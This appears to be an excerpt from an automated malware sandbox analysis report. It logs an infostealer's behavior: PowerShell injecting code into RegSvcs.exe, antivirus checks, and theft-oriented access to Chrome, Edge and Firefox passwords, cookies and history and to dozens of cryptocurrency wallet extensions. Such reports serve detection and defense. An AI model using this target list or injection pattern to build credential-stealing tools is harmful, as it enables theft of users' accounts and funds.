          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 454000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C5A008Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7408" "2496" "2432" "2500" "0" "0" "2468" "0" "0" "0" "0" "0" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: RegSvcs.exe, 00000004.00000002.1874715136.0000000001275000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.1874616021.000000000121E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7608, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: RegSvcs.exe, 00000004.00000002.1874616021.0000000001226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
          Source: RegSvcs.exe, 00000004.00000002.1874616021.0000000001226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
          Source: RegSvcs.exe, 00000004.00000002.1874616021.0000000001226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
          Source: RegSvcs.exe, 00000004.00000002.1874745531.0000000001298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
          Source: RegSvcs.exe, 00000004.00000002.1874616021.0000000001226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
          Source: powershell.exe, 00000000.00000002.1917063232.00007FFD9BA70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
